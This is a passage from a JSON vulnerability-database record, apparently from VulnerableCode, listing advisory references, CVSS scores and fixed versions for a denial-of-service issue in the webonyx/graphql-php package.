"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/graphql/graphql-js/issues/2185" }, { "reference_url": "https://github.com/sangria-graphql-org/sangria/pull/12", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/sangria-graphql-org/sangria/pull/12" }, { "reference_url": "https://github.com/webonyx/graphql-php", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php" }, { "reference_url": "https://github.com/webonyx/graphql-php/commit/996adcfce33442f6fc01214777bc8620cc142d85", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php/commit/996adcfce33442f6fc01214777bc8620cc142d85" }, { "reference_url": "https://github.com/webonyx/graphql-php/releases/tag/v15.32.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php/releases/tag/v15.32.2" }, { "reference_url": "https://github.com/webonyx/graphql-php/security/advisories/GHSA-fc86-6rv6-2jpm", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/webonyx/graphql-php/security/advisories/GHSA-fc86-6rv6-2jpm" }, { "reference_url": "https://spec.graphql.org/October2021/#sec-Field-Selection-Merging", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://spec.graphql.org/October2021/#sec-Field-Selection-Merging" }, { "reference_url": "https://github.com/advisories/GHSA-9pv7-vfvm-6vr7", "reference_id": "GHSA-9pv7-vfvm-6vr7", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9pv7-vfvm-6vr7" }, { "reference_url": "https://github.com/advisories/GHSA-fc86-6rv6-2jpm", "reference_id": "GHSA-fc86-6rv6-2jpm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fc86-6rv6-2jpm" }, { "reference_url": "https://github.com/advisories/GHSA-p4qx-6w5p-4rj2", "reference_id": "GHSA-p4qx-6w5p-4rj2", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p4qx-6w5p-4rj2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/118550?format=api", "purl": "pkg:composer/webonyx/graphql-php@15.32.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-84sv-c4se-vkgu" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/webonyx/graphql-php@15.32.2" } ], "aliases": [ "GHSA-fc86-6rv6-2jpm" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mvyr-p2h6-fybm" } ], "fixing_vulnerabilities": [], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/webonyx/graphql-php@14.11.1" }